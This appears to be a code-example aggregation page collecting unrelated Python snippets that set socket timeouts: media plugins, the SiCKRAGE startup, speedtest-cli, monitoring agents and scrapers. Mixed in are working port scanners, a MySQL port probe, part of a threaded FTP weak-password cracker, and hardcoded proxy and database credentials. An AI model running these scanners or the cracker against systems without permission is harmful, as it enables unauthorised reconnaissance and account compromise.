import urllib, urllib2, re, xbmcplugin, xbmcgui, sys, xbmcaddon, base64, socket

socket.setdefaulttimeout(30)
pluginhandle = int(sys.argv[1])
addon = xbmcaddon.Addon(id='plugin.video.ign_com')
translation = addon.getLocalizedString

maxVideoQuality = addon.getSetting("maxVideoQualityRes")
forceViewMode = addon.getSetting("forceViewMode")
if forceViewMode == "true":
    forceViewMode = True
else:
    forceViewMode = False
viewMode = str(addon.getSetting("viewMode"))

maxVideoHeight = [360, 540, 720, 1080][int(maxVideoQuality)]
maxVideoBitrate = [1000000, 1500000, 2500000, 5000000][int(maxVideoQuality)]
maxVideoQuality = [640, 960, 1280, 1920][int(maxVideoQuality)]


def index():
    addDir(translation(30002),
           "http://www.ign.com/videos/all/filtergalleryajax?filter=all",
           'listVideos', "")
    addDir("IGN Daily Fix", "http://www.ign.com/videos/series/ign-daily-fix",
           'listVideos', "")
    addDir("IGN Live", "http://www.ign.com/videos/series/ign-live",
           'listVideos', "")
    addDir("IGN First",
Exemple #39
0
#coding:utf-8:
import urllib
import re
import download
import socket

socket.setdefaulttimeout(10.0)


def get_information(url):
    list = []
    try:
        response = urllib.urlopen(url)
        test = response.read()
    except Exception, e:
        test = ''
        pass

    m1 = re.search('data-name="(.*?)"', test)
    try:
        name = m1.group(1)  #apk文件名
    except Exception, e:
        name = '0'

    m2 = re.search('href="(.*?)".*?下载 APK 文件', test)
    try:
        down_url = m2.group(1)
    except Exception, e:
        down_url = '0'

    url = down_url  #下载url
Exemple #40
0
    def start(self):
        self.started = True

        # thread name
        threading.currentThread().setName('CORE')

        # patch modules with encoding kludge
        patch_modules()

        # init core classes
        self.notifier_providers = NotifierProviders()
        self.metadata_providers = MetadataProviders()
        self.search_providers = SearchProviders()
        self.log = Logger()
        self.config = Config()
        self.api = API()
        self.alerts = Notifications()
        self.main_db = MainDB()
        self.cache_db = CacheDB()
        self.failed_db = FailedDB()
        self.scheduler = BackgroundScheduler()
        self.wserver = WebServer()
        self.wsession = WebSession()
        self.google_auth = GoogleAuth()
        self.name_cache = NameCache()
        self.show_queue = ShowQueue()
        self.search_queue = SearchQueue()
        self.postprocessor_queue = PostProcessorQueue()
        self.version_updater = VersionUpdater()
        self.show_updater = ShowUpdater()
        self.daily_searcher = DailySearcher()
        self.failed_snatch_searcher = FailedSnatchSearcher()
        self.backlog_searcher = BacklogSearcher()
        self.proper_searcher = ProperSearcher()
        self.trakt_searcher = TraktSearcher()
        self.subtitle_searcher = SubtitleSearcher()
        self.auto_postprocessor = AutoPostProcessor()


        # Check if we need to perform a restore first
        if os.path.exists(os.path.abspath(os.path.join(self.data_dir, 'restore'))):
            success = restoreSR(os.path.abspath(os.path.join(self.data_dir, 'restore')), self.data_dir)
            print("Restoring SiCKRAGE backup: %s!\n" % ("FAILED", "SUCCESSFUL")[success])
            if success:
                shutil.rmtree(os.path.abspath(os.path.join(self.data_dir, 'restore')), ignore_errors=True)

        # migrate old database file names to new ones
        if os.path.isfile(os.path.abspath(os.path.join(self.data_dir, 'sickbeard.db'))):
            if os.path.isfile(os.path.join(self.data_dir, 'sickrage.db')):
                helpers.moveFile(os.path.join(self.data_dir, 'sickrage.db'),
                                 os.path.join(self.data_dir, '{}.bak-{}'
                                              .format('sickrage.db',
                                                      datetime.datetime.now().strftime(
                                                          '%Y%m%d_%H%M%S'))))

            helpers.moveFile(os.path.abspath(os.path.join(self.data_dir, 'sickbeard.db')),
                             os.path.abspath(os.path.join(self.data_dir, 'sickrage.db')))

        # load config
        self.config.load()

        # set language
        self.config.change_gui_lang(self.config.gui_lang)

        # set socket timeout
        socket.setdefaulttimeout(self.config.socket_timeout)

        # setup logger settings
        self.log.logSize = self.config.log_size
        self.log.logNr = self.config.log_nr
        self.log.logFile = os.path.join(self.data_dir, 'logs', 'sickrage.log')
        self.log.debugLogging = self.config.debug
        self.log.consoleLogging = not self.quite

        # start logger
        self.log.start()

        # user agent
        if self.config.random_user_agent:
            self.user_agent = UserAgent().random

        urlparse.uses_netloc.append('scgi')
        urllib.FancyURLopener.version = self.user_agent

        # Check available space
        try:
            total_space, available_space = getFreeSpace(self.data_dir)
            if available_space < 100:
                self.log.error('Shutting down as SiCKRAGE needs some space to work. You\'ll get corrupted data '
                               'otherwise. Only %sMB left', available_space)
                return
        except Exception:
            self.log.error('Failed getting diskspace: %s', traceback.format_exc())

        # perform database startup actions
        for db in [self.main_db, self.cache_db, self.failed_db]:
            # initialize database
            db.initialize()

            # check integrity of database
            db.check_integrity()

            # migrate database
            db.migrate()

            # misc database cleanups
            db.cleanup()

        # compact main database
        if not sickrage.app.developer and self.config.last_db_compact < time.time() - 604800:  # 7 days
            self.main_db.compact()
            self.config.last_db_compact = int(time.time())

        # load name cache
        self.name_cache.load()

        # load data for shows from database
        self.load_shows()

        if self.config.default_page not in ('home', 'schedule', 'history', 'news', 'IRC'):
            self.config.default_page = 'home'

        # cleanup cache folder
        for folder in ['mako', 'sessions', 'indexers']:
            try:
                shutil.rmtree(os.path.join(sickrage.app.cache_dir, folder), ignore_errors=True)
            except Exception:
                continue

        # init anidb connection
        if self.config.use_anidb:
            def anidb_logger(msg):
                return self.log.debug("AniDB: {} ".format(msg))

            try:
                self.adba_connection = adba.Connection(keepAlive=True, log=anidb_logger)
                self.adba_connection.auth(self.config.anidb_username, self.config.anidb_password)
            except Exception as e:
                self.log.warning("AniDB exception msg: %r " % repr(e))

        if self.config.web_port < 21 or self.config.web_port > 65535:
            self.config.web_port = 8081

        if not self.config.web_cookie_secret:
            self.config.web_cookie_secret = generateCookieSecret()

        # attempt to help prevent users from breaking links by using a bad url
        if not self.config.anon_redirect.endswith('?'):
            self.config.anon_redirect = ''

        if not re.match(r'\d+\|[^|]+(?:\|[^|]+)*', self.config.root_dirs):
            self.config.root_dirs = ''

        self.config.naming_force_folders = check_force_season_folders()

        if self.config.nzb_method not in ('blackhole', 'sabnzbd', 'nzbget'):
            self.config.nzb_method = 'blackhole'

        if self.config.torrent_method not in ('blackhole', 'utorrent', 'transmission', 'deluge', 'deluged',
                                              'download_station', 'rtorrent', 'qbittorrent', 'mlnet', 'putio'):
            self.config.torrent_method = 'blackhole'

        if self.config.autopostprocessor_freq < self.config.min_autopostprocessor_freq:
            self.config.autopostprocessor_freq = self.config.min_autopostprocessor_freq
        if self.config.daily_searcher_freq < self.config.min_daily_searcher_freq:
            self.config.daily_searcher_freq = self.config.min_daily_searcher_freq
        self.config.min_backlog_searcher_freq = self.backlog_searcher.get_backlog_cycle_time()
        if self.config.backlog_searcher_freq < self.config.min_backlog_searcher_freq:
            self.config.backlog_searcher_freq = self.config.min_backlog_searcher_freq
        if self.config.version_updater_freq < self.config.min_version_updater_freq:
            self.config.version_updater_freq = self.config.min_version_updater_freq
        if self.config.subtitle_searcher_freq < self.config.min_subtitle_searcher_freq:
            self.config.subtitle_searcher_freq = self.config.min_subtitle_searcher_freq
        if self.config.failed_snatch_age < self.config.min_failed_snatch_age:
            self.config.failed_snatch_age = self.config.min_failed_snatch_age
        if self.config.proper_searcher_interval not in ('15m', '45m', '90m', '4h', 'daily'):
            self.config.proper_searcher_interval = 'daily'
        if self.config.showupdate_hour < 0 or self.config.showupdate_hour > 23:
            self.config.showupdate_hour = 0
        if self.config.subtitles_languages[0] == '':
            self.config.subtitles_languages = []

        # add version checker job
        self.scheduler.add_job(
            self.version_updater.run,
            IntervalTrigger(
                hours=self.config.version_updater_freq
            ),
            name=self.version_updater.name,
            id=self.version_updater.name
        )

        # add network timezones updater job
        self.scheduler.add_job(
            update_network_dict,
            IntervalTrigger(
                days=1
            ),
            name="TZUPDATER",
            id="TZUPDATER"
        )

        # add show updater job
        self.scheduler.add_job(
            self.show_updater.run,
            IntervalTrigger(
                days=1,
                start_date=datetime.datetime.now().replace(hour=self.config.showupdate_hour)
            ),
            name=self.show_updater.name,
            id=self.show_updater.name
        )

        # add daily search job
        self.scheduler.add_job(
            self.daily_searcher.run,
            IntervalTrigger(
                minutes=self.config.daily_searcher_freq,
                start_date=datetime.datetime.now() + datetime.timedelta(minutes=4)
            ),
            name=self.daily_searcher.name,
            id=self.daily_searcher.name
        )

        # add failed snatch search job
        self.scheduler.add_job(
            self.failed_snatch_searcher.run,
            IntervalTrigger(
                hours=1,
                start_date=datetime.datetime.now() + datetime.timedelta(minutes=4)
            ),
            name=self.failed_snatch_searcher.name,
            id=self.failed_snatch_searcher.name
        )

        # add backlog search job
        self.scheduler.add_job(
            self.backlog_searcher.run,
            IntervalTrigger(
                minutes=self.config.backlog_searcher_freq,
                start_date=datetime.datetime.now() + datetime.timedelta(minutes=30)
            ),
            name=self.backlog_searcher.name,
            id=self.backlog_searcher.name
        )

        # add auto-postprocessing job
        self.scheduler.add_job(
            self.auto_postprocessor.run,
            IntervalTrigger(
                minutes=self.config.autopostprocessor_freq
            ),
            name=self.auto_postprocessor.name,
            id=self.auto_postprocessor.name
        )

        # add find proper job
        self.scheduler.add_job(
            self.proper_searcher.run,
            IntervalTrigger(
                minutes={'15m': 15, '45m': 45, '90m': 90, '4h': 4 * 60, 'daily': 24 * 60}[
                    self.config.proper_searcher_interval]
            ),
            name=self.proper_searcher.name,
            id=self.proper_searcher.name
        )

        # add trakt.tv checker job
        self.scheduler.add_job(
            self.trakt_searcher.run,
            IntervalTrigger(
                hours=1
            ),
            name=self.trakt_searcher.name,
            id=self.trakt_searcher.name
        )

        # add subtitles finder job
        self.scheduler.add_job(
            self.subtitle_searcher.run,
            IntervalTrigger(
                hours=self.config.subtitle_searcher_freq
            ),
            name=self.subtitle_searcher.name,
            id=self.subtitle_searcher.name
        )

        # start scheduler service
        self.scheduler.start()

        # Pause/Resume PROPERSEARCHER job
        (self.scheduler.get_job(self.proper_searcher.name).pause,
         self.scheduler.get_job(self.proper_searcher.name).resume
         )[self.config.download_propers]()

        # Pause/Resume TRAKTSEARCHER job
        (self.scheduler.get_job(self.trakt_searcher.name).pause,
         self.scheduler.get_job(self.trakt_searcher.name).resume
         )[self.config.use_trakt]()

        # Pause/Resume SUBTITLESEARCHER job
        (self.scheduler.get_job(self.subtitle_searcher.name).pause,
         self.scheduler.get_job(self.subtitle_searcher.name).resume
         )[self.config.use_subtitles]()

        # Pause/Resume POSTPROCESS job
        (self.scheduler.get_job(self.auto_postprocessor.name).pause,
         self.scheduler.get_job(self.auto_postprocessor.name).resume
         )[self.config.process_automatically]()

        # Pause/Resume FAILEDSNATCHSEARCHER job
        (self.scheduler.get_job(self.failed_snatch_searcher.name).pause,
         self.scheduler.get_job(self.failed_snatch_searcher.name).resume
         )[self.config.use_failed_snatcher]()

        # start queue's
        self.search_queue.start()
        self.show_queue.start()
        self.postprocessor_queue.start()

        # start webserver
        self.wserver.start()
Exemple #41
0
import cx_Oracle as cx
import urllib
from urllib.request import Request, urlopen
from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.triggers.interval import IntervalTrigger
from apscheduler.triggers.cron import CronTrigger
from loger import make_log
from datetime import datetime, date, timedelta

# 编码问题
importlib.reload(sys)
os.environ['NLS_LANG'] = 'Simplified Chinese_CHINA.ZHS16GBK'

# 主机断开连接问题
import socket
socket.setdefaulttimeout(20)  # 设置socket层的超时时间为20秒

logger = make_log('us_epidemic', 'github_epidemic')

# 代理
proxy = 'zzy:[email protected]:80'
proxy_handler = {'http': 'http://' + proxy, 'https': 'https://' + proxy}


# 无代理
def get_data(url):
    firefox_headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'
    }
    # response = urlopen(url=url, timeout=60)
Exemple #42
0
 def setTimeOut(self, timeout=6.0):
     """Set the time to wait for a response from the server."""
     self.timeout = timeout
     socket.setdefaulttimeout(self.timeout)
Exemple #43
0
#!/usr/bin/env python3
import socket
import sys
from datetime import datetime
from contextlib import closing

socket.setdefaulttimeout(.001)
remoteServerIP = input("Enter IP Addr to Scan: ")

print("-" * 45)
print("\tPlease Wait... Scanning ")
print("-" * 45)

start = datetime.now()

try:
    for port in range(1, 1023):
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            result = s.connect_ex((remoteServerIP, port))

            if result == 0:
                # connection found
                print("[+] Port %d: \tOpen" % (port))

            else:
                # No connection found
                print("[-] Port %d: \tClosed" % (port))

except KeyboardInterrupt:
    print("\n\tTerminating Scan ...")
    sys.exit()
Exemple #44
0
                            else:
                                #reset retry
                                account = None  #None=NULL
                                retry = 0
 
 
        threads = []
        for i in range(nthreads):  #nthreads=10  创建10个线程
            threads.append(crackThread(self.writer,self.logger))  #writer=ftp_result.csv   logfile='ftp_errorlog.log
 
        for thread in threads:   #不理解这是什么意思    是结束线程吗
            thread.start()  #start就是开始线程
         
        for thread in threads:   #不理解这是什么意思    是结束线程吗
            thread.join()
        print u"扫描结束"
 
 
 
if __name__ == '__main__':
    import sys
    import socket
    socket.setdefaulttimeout(10)  #设置了全局默认超时时间
     
    if len(sys.argv)!=2:
        print u'PythonFtpScanner V1.0  by redice\n'
        print u'用法:\n\tPythonFtpScanner.py ftp.redicecn.com \n\n注意:\n\t建议使用域名作为参数。\n\t弱口令字典支持域变量。'
    else:
        ftp_cracker = PythonFtpScanner()  #初始化类
        ftp_cracker.ftp_login(sys.argv[1].strip())  #传入要扫描的域名
        print u'\n所有扫描!结果在 ftp_result.csv'
Exemple #45
0
import csv  # 系统内置模块
import socket
import urllib.request as request
from logging import getLogger, INFO
from concurrent_log_handler import ConcurrentRotatingFileHandler
import os
import multiprocessing as multip, time
from multiprocessing import Process, Pipe, Event, Condition, Lock, Pool, Value, Array

socket.setdefaulttimeout(120)

log = getLogger()
# Use an absolute path to prevent file rotation trouble.
logfile = os.path.abspath("wo.log")
# Rotate log after reaching 512K, keep 5 old copies.
rotateHandler = ConcurrentRotatingFileHandler(logfile, "a", 512 * 1024, 5)
log.addHandler(rotateHandler)
log.setLevel(INFO)


def mkdir(path):
    # 去除首位空格
    path = path.strip()
    # 去除尾部 \ 符号
    path = path.rstrip("\\")
    # 判断路径是否存在
    # 存在     True
    # 不存在   False
    isExists = os.path.exists(path)
    # 判断结果
    if not isExists:
Exemple #46
0
def request(method,
            url,
            params=None,
            data=None,
            headers=None,
            cookies=None,
            files=None,
            auth=None,
            timeout=60,
            allow_redirects=False):
    """Initiate an HTTP(S) request. Returns :class:`Response` object.

    :param method: 'GET' or 'POST'
    :type method: ``unicode``
    :param url: URL to open
    :type url: ``unicode``
    :param params: mapping of URL parameters
    :type params: ``dict``
    :param data: mapping of form data ``{'field_name': 'value'}`` or ``str``
    :type data: ``dict`` or ``str``
    :param headers: HTTP headers
    :type headers: ``dict``
    :param cookies: cookies to send to server
    :type cookies: ``dict``
    :param files: files to upload
    :type files:
    :param auth: username, password
    :type auth: ``tuple``
    :param timeout: connection timeout limit in seconds
    :type timeout: ``int``
    :param allow_redirects: follow redirections
    :type allow_redirects: ``Boolean``
    :returns: :class:`Response` object

    """

    socket.setdefaulttimeout(timeout)

    # Default handlers
    openers = []

    if not allow_redirects:
        openers.append(NoRedirectHandler())

    if auth:  # Add authorisation handler
        username, password = auth
        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(None, url, username, password)
        auth_manager = urllib2.HTTPBasicAuthHandler(password_manager)
        openers.append(auth_manager)

    # Install our custom chain of openers
    opener = urllib2.build_opener(*openers)
    urllib2.install_opener(opener)

    if not headers:
        headers = {}
    if 'User-Agent' not in headers:
        headers['User-Agent'] = USER_AGENT

    if files:
        if not data:
            data = {}
        new_headers, data = encode_multipart_formdata(data, files)
        headers.update(new_headers)
    elif data and isinstance(data, dict):
        data = urllib.urlencode(str_dict(data))

    # Make sure everything is encoded text
    headers = str_dict(headers)

    if isinstance(url, unicode):
        url = url.encode('utf-8')

    if params:  # GET args (POST args are handled in encode_multipart_formdata)
        url = url + '?' + urllib.urlencode(str_dict(params))

    req = urllib2.Request(url, data, headers)
    return Response(req)
Exemple #47
0
def speedtest():
    """Run the full speedtest.net test"""

    global shutdown_event, source, scheme
    shutdown_event = threading.Event()

    signal.signal(signal.SIGINT, ctrl_c)

    description = (
        'Command line interface for testing internet bandwidth using '
        'speedtest.net.\n'
        '------------------------------------------------------------'
        '--------------\n'
        'https://github.com/sivel/speedtest-cli')

    parser = ArgParser(description=description)
    # Give optparse.OptionParser an `add_argument` method for
    # compatibility with argparse.ArgumentParser
    try:
        parser.add_argument = parser.add_option
    except AttributeError:
        pass
    parser.add_argument('--bytes',
                        dest='units',
                        action='store_const',
                        const=('byte', 1),
                        default=('bit', 8),
                        help='Display values in bytes instead of bits. Does '
                        'not affect the image generated by --share')
    parser.add_argument('--share',
                        action='store_true',
                        help='Generate and provide a URL to the speedtest.net '
                        'share results image')
    parser.add_argument('--simple',
                        action='store_true',
                        help='Suppress verbose output, only show basic '
                        'information')
    parser.add_argument('--list',
                        action='store_true',
                        help='Display a list of speedtest.net servers '
                        'sorted by distance')
    parser.add_argument('--server', help='Specify a server ID to test against')
    parser.add_argument('--mini', help='URL of the Speedtest Mini server')
    parser.add_argument('--source', help='Source IP address to bind to')
    parser.add_argument('--timeout',
                        default=10,
                        type=int,
                        help='HTTP timeout in seconds. Default 10')
    parser.add_argument('--secure',
                        action='store_true',
                        help='Use HTTPS instead of HTTP when communicating '
                        'with speedtest.net operated servers')
    parser.add_argument('--version',
                        action='store_true',
                        help='Show the version number and exit')

    options = parser.parse_args()
    if isinstance(options, tuple):
        args = options[0]
    else:
        args = options
    del options

    # Print the version and exit
    if args.version:
        version()

    socket.setdefaulttimeout(args.timeout)

    # Pre-cache the user agent string
    build_user_agent()

    # If specified bind to a specific IP address
    if args.source:
        source = args.source
        socket.socket = bound_socket

    if args.secure:
        scheme = 'https'

    if not args.simple:
        print_('Retrieving speedtest.net configuration...')
    try:
        config = getConfig()
    except URLError:
        print_('Cannot retrieve speedtest configuration')
        sys.exit(1)

    if not args.simple:
        print_('Retrieving speedtest.net server list...')
    if args.list or args.server:
        servers = closestServers(config['client'], True)
        if args.list:
            serverList = []
            for server in servers:
                line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
                        '[%(d)0.2f km]' % server)
                serverList.append(line)
            print_('\n'.join(serverList).encode('utf-8', 'ignore'))
            sys.exit(0)
    else:
        servers = closestServers(config['client'])

    if not args.simple:
        print_('Testing from %(isp)s (%(ip)s)...' % config['client'])

    if args.server:
        try:
            best = getBestServer(
                filter(lambda x: x['id'] == args.server, servers))
        except IndexError:
            print_('Invalid server ID')
            sys.exit(1)
    elif args.mini:
        name, ext = os.path.splitext(args.mini)
        if ext:
            url = os.path.dirname(args.mini)
        else:
            url = args.mini
        urlparts = urlparse(url)
        try:
            request = build_request(args.mini)
            f = urlopen(request)
        except:
            print_('Invalid Speedtest Mini URL')
            sys.exit(1)
        else:
            text = f.read()
            f.close()
        extension = re.findall('upload_extension: "([^"]+)"', text.decode())
        if not extension:
            for ext in ['php', 'asp', 'aspx', 'jsp']:
                try:
                    request = build_request('%s/speedtest/upload.%s' %
                                            (args.mini, ext))
                    f = urlopen(request)
                except:
                    pass
                else:
                    data = f.read().strip()
                    if (f.code == 200 and len(data.splitlines()) == 1
                            and re.match('size=[0-9]', data)):
                        extension = [ext]
                        break
        if not urlparts or not extension:
            print_('Please provide the full URL of your Speedtest Mini server')
            sys.exit(1)
        servers = [{
            'sponsor':
            'Speedtest Mini',
            'name':
            urlparts[1],
            'd':
            0,
            'url':
            '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
            'latency':
            0,
            'id':
            0
        }]
        try:
            best = getBestServer(servers)
        except:
            best = servers[0]
    else:
        if not args.simple:
            print_('Selecting best server based on latency...')
        best = getBestServer(servers)

    if not args.simple:
        print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
                '%(latency)s ms' % best).encode('utf-8', 'ignore'))
    else:
        print_('Ping: %(latency)s ms' % best)

    sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
    urls = []
    for size in sizes:
        for i in range(0, 4):
            urls.append('%s/random%sx%s.jpg' %
                        (os.path.dirname(best['url']), size, size))
    if not args.simple:
        print_('Testing download speed', end='')
    dlspeed = downloadSpeed(urls, args.simple)
    if not args.simple:
        print_()
    print_('Download: %0.2f M%s/s' %
           ((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))

    sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
    sizes = []
    for size in sizesizes:
        for i in range(0, 25):
            sizes.append(size)
    if not args.simple:
        print_('Testing upload speed', end='')
    ulspeed = uploadSpeed(best['url'], sizes, args.simple)
    if not args.simple:
        print_()
    print_('Upload: %0.2f M%s/s' %
           ((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))

    if args.share and args.mini:
        print_('Cannot generate a speedtest.net share results image while '
               'testing against a Speedtest Mini server')
    elif args.share:
        dlspeedk = int(round((dlspeed / 1000) * 8, 0))
        ping = int(round(best['latency'], 0))
        ulspeedk = int(round((ulspeed / 1000) * 8, 0))

        # Build the request to send results back to speedtest.net
        # We use a list instead of a dict because the API expects parameters
        # in a certain order
        apiData = [
            'download=%s' % dlspeedk,
            'ping=%s' % ping,
            'upload=%s' % ulspeedk, 'promo=',
            'startmode=%s' % 'pingselect',
            'recommendedserverid=%s' % best['id'],
            'accuracy=%s' % 1,
            'serverid=%s' % best['id'],
            'hash=%s' % md5(
                ('%s-%s-%s-%s' %
                 (ping, ulspeedk, dlspeedk, '297aae72')).encode()).hexdigest()
        ]

        headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
        request = build_request('://www.speedtest.net/api/api.php',
                                data='&'.join(apiData).encode(),
                                headers=headers)
        f, e = catch_request(request)
        if e:
            print_('Could not submit results to speedtest.net: %s' % e)
            sys.exit(1)
        response = f.read()
        code = f.code
        f.close()

        if int(code) != 200:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        qsargs = parse_qs(response.decode())
        resultid = qsargs.get('resultid')
        if not resultid or len(resultid) != 1:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        print_('Share results: %s://www.speedtest.net/result/%s.png' %
               (scheme, resultid[0]))
# -*- coding: utf-8 -*-

import socket

socket.setdefaulttimeout(0.1)

def main(IP):
    name = ""
    type = ""
    protocolType = ""
    protocolPort = ""
    serviceType = "MYSQL"
    servicePort = "3306"

    device = ["", IP, "", "", "", "", ""]

    try:
        # get host, will raise error if not found
        # name = socket.gethostbyaddr(IP)[0]
        device[0] = r"ipaddr-" + IP

        # type, protocolType, protocolPort
        device[2] = type
        device[3] = protocolType
        device[4] = protocolPort

        # find if there is MSSQL Service running
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn = s.connect_ex((IP, int(servicePort)))
        if conn == 0:
            s.close()
    default='sC')
parser.add_option('-d',
                  dest='Delay',
                  type='int',
                  help='Specify Delay Time',
                  default=0.1)
(options, args) = parser.parse_args()
port = str(options.port)
port_start, port_stop = port.split('-')
port_start = int(port_start)
port_stop = int(port_stop)
timeout = options.Delay
type_scan = options.type_scan
target = options.host

socket.setdefaulttimeout(0.53)

try:
    t_IP = socket.gethostbyname(target)
except:
    print('Cannot resolve %s: Unknown host' % target)
    exit()

if port_start > port_stop:
    print('can not scan this ports')
    exit()

ports = port_stop - port_start
print('Interesting {} ports on {}'.format(ports, t_IP))
print('PORT \t STATE \t\t SERVICE')
Exemple #50
0
 def __init__(self, args):
     win32serviceutil.ServiceFramework.__init__(self, args)
     self.stop_event = win32event.CreateEvent(None, 0, 0, None)
     socket.setdefaulttimeout(60)
     self.stop_requested = False
Exemple #51
0
    def __init__(self, agentConfig, emitters, systemStats, hostname):
        self.emit_duration = None
        self.agentConfig = agentConfig
        self.hostname = hostname
        # system stats is generated by config.get_system_stats
        self.agentConfig['system_stats'] = systemStats
        # agent config is used during checks, system_stats can be accessed through the config
        self.os = get_os()
        self.plugins = None
        self.emitters = emitters
        self.check_timings = agentConfig.get('check_timings')
        self.push_times = {
            'host_metadata': {
                'start': time.time(),
                'interval': int(agentConfig.get('metadata_interval', 4 * 60 * 60))
            },
            'external_host_tags': {
                'start': time.time() - 3 * 60,  # Wait for the checks to init
                'interval': int(agentConfig.get('external_host_tags', 5 * 60))
            },
            'agent_checks': {
                'start': time.time(),
                'interval': int(agentConfig.get('agent_checks_interval', 10 * 60))
            },
        }
        socket.setdefaulttimeout(15)
        self.run_count = 0
        self.continue_running = True
        self.hostname_metadata_cache = None
        self.initialized_checks_d = []
        self.init_failed_checks_d = {}

        # Unix System Checks
        self._unix_system_checks = {
            'io': u.IO(log),
            'load': u.Load(log),
            'memory': u.Memory(log),
            'processes': u.Processes(log),
            'cpu': u.Cpu(log),
            'system': u.System(log)
        }

        # Win32 System `Checks
        self._win32_system_checks = {
            'io': w32.IO(log),
            'proc': w32.Processes(log),
            'memory': w32.Memory(log),
            'network': w32.Network(log),
            'cpu': w32.Cpu(log),
            'system': w32.System(log)
        }

        # Old-style metric checks
        self._ganglia = Ganglia(log)
        self._dogstream = Dogstreams.init(log, self.agentConfig)
        self._ddforwarder = DdForwarder(log, self.agentConfig)

        # Agent performance metrics check
        self._agent_metrics = None

        self._metrics_checks = []

        # Custom metric checks
        for module_spec in [s.strip() for s in self.agentConfig.get('custom_checks', '').split(',')]:
            if len(module_spec) == 0:
                continue
            try:
                self._metrics_checks.append(modules.load(module_spec, 'Check')(log))
                log.info("Registered custom check %s" % module_spec)
                log.warning("Old format custom checks are deprecated. They should be moved to the checks.d interface as old custom checks will be removed in a next version")
            except Exception:
                log.exception('Unable to load custom check module %s' % module_spec)

        # Resource Checks
        self._resources_checks = [
            ResProcesses(log, self.agentConfig)
        ]
Exemple #52
0
#coding=utf8
"""
from tansuozhe:djq002
"""
import urllib2
import HTMLParser
from BeautifulSoup import BeautifulSoup
from lxml import html
import MySQLdb
import re
import sys
import requests
import socket
import string
socket.setdefaulttimeout(8.0)
reload(sys)
sys.setdefaultencoding("utf-8")  # 重新加载系统并设置默认编码


#------------------------------------------------------------------------------
#---------------------------- 定义操作mysql函数 step1-------------------------
#------------------------------------------------------------------------------
def mysqlexe(sql):
    db = MySQLdb.connect('localhost',
                         'root',
                         'djq002',
                         'joblinks',
                         charset='utf8')
    cur = db.cursor()
    cur.execute(sql)
    result = cur.fetchall()
 def _f(*args, **kwargs):
   orig_timeout = socket.getdefaulttimeout()
   socket.setdefaulttimeout(args[0].__timeout)
   result = f(*args, **kwargs)
   socket.setdefaulttimeout(orig_timeout)
   return result
def post(ali_uid, metric_name, metric_value, unit, fields):
    # init logger
    logger = logging.getLogger('post')
    logger.setLevel(logging.INFO)
    handler = RotatingFileHandler(filename="/tmp/post.log",
                                  mode='a',
                                  maxBytes=1024 * 1024,
                                  backupCount=3)
    formatter = logging.Formatter(
        fmt='%(asctime)s - %(levelname)s - %(message)s')
    handler.setFormatter(formatter)
    logger.addHandler(handler)
    socket.setdefaulttimeout(10)

    # convert dimensions
    kv_array = fields.split(',')
    dimensions = {}
    for kv in kv_array:
        kv_array = kv.split('=')
        #print "dimensions:%s=%s" %(kv_array[0],kv_array[1])
        dimensions[kv_array[0]] = kv_array[1]
    json_str = json.dumps(dimensions)

    #current timestamp
    timestamp = int(time.time() * 1000)

    #concate to metrics
    metrics = '[{"metricName": "%s","timestamp": %s,"value": %s, "unit": "%s", "dimensions": %s}]' % (
        metric_name, str(timestamp), str(metric_value), unit, json_str)

    params = {
        "userId": ali_uid,
        "namespace": "acs/custom/%s" % ali_uid,
        "metrics": metrics
    }
    print params
    #report at random 5 seconds
    interval = random.randint(0, 5000)
    time.sleep(interval / 1000.0)

    data = urllib.urlencode(params)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "close"
    }
    exception = None
    http_client = None
    try:
        http_client = httplib.HTTPConnection(REMOTE_HOST, REMOTE_PORT)
        try:
            http_client.request(method="POST",
                                url=REMOTE_MONITOR_URI,
                                body=data,
                                headers=headers)
            response = http_client.getresponse()
            if response.status == 200:
                print "upload metric succeed!"
                return
            else:
                print "response code %d, content %s " % (response.status,
                                                         response.read())
                logger.warn("response code %d, content %s " %
                            (response.status, response.read()))
        except Exception, e:
            exception = e
    finally:
        if http_client:
            http_client.close()
        if exception:
            logger.error(exception)
Exemple #55
0
 def __init__(self, args):
     win32serviceutil.ServiceFramework.__init__(self, args)
     # create an event to listen for stop requests on
     self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
     socket.setdefaulttimeout(120)
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#

import re, sys, urllib, urllib2
import socket

socket.setdefaulttimeout(15)

ACS_URL = 'http://pubs.acs.org'

CITATION_FORMATS_URL = ACS_URL + '/action/showCitFormats'
CITATION_DOWNLOAD_URL = ACS_URL + '/action/downloadCitation'

